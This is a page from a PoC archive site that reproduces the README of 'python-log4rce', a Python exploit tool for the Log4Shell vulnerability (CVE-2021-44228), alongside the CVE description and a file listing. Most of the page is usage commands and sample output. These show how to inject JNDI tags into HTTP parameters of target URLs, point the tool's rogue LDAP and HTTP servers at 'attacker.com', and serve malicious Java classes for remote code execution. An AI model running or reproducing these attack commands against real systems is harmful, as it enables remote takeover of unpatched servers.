Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source
https://github.com/alexandre-lavoie/python-log4rce
Associated Vulnerability
Title:Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description:Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
An All-In-One Pure Python PoC for CVE-2021-44228
Readme
# Python Log4RCE

An all-in-one pure Python3 PoC for [CVE-2021-44228](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228).

## Sample

```bash
> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
```

```
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!
```

## Usage

This is a CLI tool. All options can be found in the help menu:

```bash
python3 log4rce.py --help
```

The list is pretty extensive, therefore the following will give you a summary of the functionality.

### Attack Modes

The tool allows you to use a few attack modes. These attacks are extensions of the `Log4RCE` class.

#### HTTP

You can perform an automated HTTP request attack on a target URL.

You can perform a GET request as follows:

```bash
python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"
```

You can perform a POST request as follows:

```bash
python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"
```

The previous will inject the JNDI tag into `###`.

#### Manual

If you cannot use any of the previous, use this mode to dump the JDNI tag:

```bash
python3 log4rce.py manual
```

### Network Settings

The tool allows extensive customization for most network configuration. All the internal servers can be modified to point to different locations according the the remote settings.

#### HTTP Server

You can configure the HTTP server using the following parameters:

```bash
python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
```

```
http_port: The local port to run the server on.
http_rport: The port that a remote machine accesses.
http_host: The host name/IP a remote machine accesses. 
```

#### LDAP Server

You can configure the LDAP server using the following parameters:

```bash
python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
```

```
ldap_port: The local port to run the server on.
ldap_rport: The port that a remote machine accesses.
ldap_host: The host name/IP a remote machine accesses. 
```

### Customization

The tool allows can handle some customization. The following lists some functionality you may be interested in.

### Injecting Payload

You can inject a payload into the Java class using:

```bash
python3 log4rce.py --payload "PAYLOAD"
```

The payload will be injected into `"###"` strings.

### Custom Java Payload

You can build your own Java class using the following. 

```bash
javac -source 1.7 -target 1.7 /path/to/Exploit.java
```

The resulting `.class` can be run using:

```bash
python3 log4rce.py --java_class "/path/to/Exploit.class" ...
```

Note: You can add a string `"###"` to allow payload injection.
File Snapshot

 [4.0K]  /data/pocs/54df8018fe97230bed42fa7066c778d8b1512620
├── [4.0K]  java
│   ├── [ 139]  Exploit.java
│   └── [ 173]  LinuxExploit.java
├── [1.0K]  LICENSE
├── [ 14K]  log4rce.py
└── [3.0K]  README.md

1 directory, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →